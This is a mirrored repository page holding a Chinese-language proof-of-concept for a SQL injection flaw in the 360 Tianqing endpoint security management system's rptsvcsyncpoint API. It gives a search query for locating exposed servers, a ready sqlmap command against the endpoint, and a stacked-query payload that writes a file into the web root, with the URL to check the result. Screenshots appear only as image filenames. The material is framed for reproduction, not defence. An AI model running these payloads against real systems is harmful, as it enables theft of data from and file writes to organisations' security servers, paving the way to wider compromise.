admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/360/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.7 KiB
Raw Blame History

360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞

一、漏洞简介

天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体兼容不同操作系统和计算平台帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎rptsvcsyncpoint存在SQL注入漏洞攻击者可通过此漏洞获取敏感信息。

二、影响版本

  • 360天擎终端安全管理系统

三、资产测绘

  • hunterapp.name=="天擎终端安全管理系统"
  • 特征

1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png

四、漏洞复现

sqlmap

python3 sqlmap.py -u "https://xx.xx.xx.xx/api/dp/rptsvcsyncpoint?ccid=1" --batch --skip-waf

1699458415629-df2c5e1b-d4b0-445d-a456-bafb539988d5.png

文件写入

/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('123456~');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\stc.txt';drop table O;--

1699458549014-42cd0a5a-b665-4a50-ad55-9d83aa571b4c.png

写入文件位置

http://xx.xx.xx.xx/stc.txt

1699458583924-6db94f8b-bbe7-4f84-b5b6-a44495337abb.png

更新: 2024-02-29 23:57:16
原文: https://www.yuque.com/xiaokp7/ocvun2/bmxoqmgt074w5sod